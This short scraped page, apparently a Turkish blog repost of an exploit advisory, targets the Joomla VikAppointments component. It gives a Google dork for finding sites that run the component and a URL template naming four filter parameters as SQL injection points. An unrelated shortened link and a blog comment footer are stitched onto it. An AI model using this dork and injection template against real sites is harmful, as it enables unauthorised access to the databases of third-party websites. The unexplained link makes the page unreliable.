Google Dork: inurl:index.php?option=com_vikappointments
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL]
# ext4joo_vikappointmentsj3demo
http://activeation.com/AMoV
Hiç yorum yok:
Yorum Gönder